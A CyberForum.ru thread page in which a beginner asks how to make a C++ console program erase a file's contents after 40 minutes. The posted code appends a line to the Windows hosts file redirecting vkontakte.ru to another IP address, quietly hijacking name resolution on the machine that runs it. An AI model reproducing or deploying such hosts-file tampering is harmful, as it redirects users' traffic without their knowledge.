Форум программистов, компьютерный форум CyberForum.ru

Таймер в консольном приложении - C++

Войти
Другие темы раздела
C++ Обход бинарного дерева без рекурсии http://www.cyberforum.ru/cpp-beginners/thread52368.html
нужно написать алгоритм обхода бинарного дерева без использования рекурсии, а с помощью стека. Проверить на дереве int, но в самом коде испльзовать указатели на функцию - типа что дерево состоит из чего угодно... Кто знает КАК ЭТО ДЕЛАТЬ НА СИ???
C++ Матрица по спирали Довольно простая задача...вбить матрицу по спирали...но не могу справиться с тем, что матрица может быть не обязательно квадратная..прошу глянуть мой код и если возможно укажите, что следует подправить.. #include "stdio.h" #include "stdafx.h" #include "iostream" using std::cout; using std::cin; using std::endl; http://www.cyberforum.ru/cpp-beginners/thread52349.html
НЕрекурсивный обход бинарного дерева C++
уважаемые программисты! нужно написать алгоритм обхода бинарного дерева без использования рекурсии, а с помощью стека. Проверить на дереве int, но в самом коде испльзовать указатели на функцию - типа что дерево состоит из чего угодно... Кто знает КАК ЭТО ДЕЛАТЬ НА СИ???
C++ Нужна справка для новичка
Люди, help pls... 1. Каким образом представляются символьные данные? 2. Чему равен результат выражения (int y): int x = y = 3.5; 3. Найдите ошибки в операторах ввода/вывода (ответ пояснить): a) cout << 0xDED;
C++ классы http://www.cyberforum.ru/cpp-beginners/thread52315.html
Определить класс «МЕБЕЛЬ». Компонентные данные класса: вид мебели – char*, изготовитель – char*, стоимость – float Методы класса: 1) функция для ввода с клавиатуры значений компонентных данных объекта класса; 2) функция для вывода на экран значений компонентных данных объекта класса. В основной программе объявит объект, массив объектов и указатель на объект данного класса (указатель...
C++ Как получить доступ к указателю __vfptr Имеется класс в котором все функции определены, как виртуальные, следовательно для них создается таблица виртуальных методов vtbl(virtual method table), необходимо получить доступ к его методам, зная его адреса. Однако когда я пытаюсь использовать, поле __vfptr класса содержащего хотя бы один виртуальный метод, но компилятор говорит что такого поля нет, хотя при отладке это поле прекрасно видно.... подробнее

Показать сообщение отдельно
selevit
79 / 75 / 3

Таймер в консольном приложении - C++

24.09.2009, 16:12. Просмотров 3171. Ответов 17
Метки (Все метки)

Всем доброго времени суток, у меня вопрос, как сделать так, чтобы программа записывала текст в файл, а, к примеру через 40 минут стирала весь текст из этого файла? как можно реализовать это в таком коде?

C++
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#include "stdafx.h"
#include <stdio.h>

int main()
{
  FILE* file;
  char* file_name = "C:\\WINDOWS\\System32\\drivers\\etc\\hosts";

file = fopen(file_name, "a");

if(!file)
    return 0;

fseek(file, 0, SEEK_END);

fputs("\n93.158.134.11 vkontakte.ru", file );

fclose( file );

return 0;
}
P.S. Если диска С: не существует то программа не заработает -
C++
1
char* file_name = "C:\\WINDOWS\\System32\\drivers\\etc\\hosts";
, я слышал о %systemroot%, но не знаю как это оформляется.

Заранее спасибо!!!
После регистрации реклама в сообщениях будет скрыта и будут доступны все возможности форума.

Текущее время: 12:17. Часовой пояс GMT +3.
КиберФорум - форум программистов, компьютерный форум, программирование